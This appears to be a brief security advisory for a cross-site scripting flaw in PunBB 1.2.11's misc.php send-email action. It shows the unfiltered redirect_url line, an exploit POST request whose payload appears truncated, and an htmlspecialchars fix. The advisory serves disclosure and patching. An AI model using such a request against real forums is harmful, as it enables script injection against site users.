|
PunBB 1.2.11 Cross-Site Scripting=0D
=0D
File name :- misc.php=0D
Action :- Send Email=0D
Line :- 123=0D
=0D
[php]=0D
redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']);=0D
[/php]=0D
=0D
The $_POST['redirect_url'] = Unfilter Input=0D
=0D
Exploit :-=0D
=0D
Send POST Request=0D
=0D
[code]=0D
GET :-=0D
/PunBB/misc.php?email=2=0D
POST :-=0D
form_sent=1&redirect_url=index.php&req_subject=test&req_message=test">=0D
[/code]=0D
=0D
Fix :-=0D
=0D
Replace The Line With :-=0D
=0D
[php]=0D
redirect(htmlspecialchars($_POST['redirect_url']), $lang_misc['E-mail sent redirect']);=0D
[/php]=0D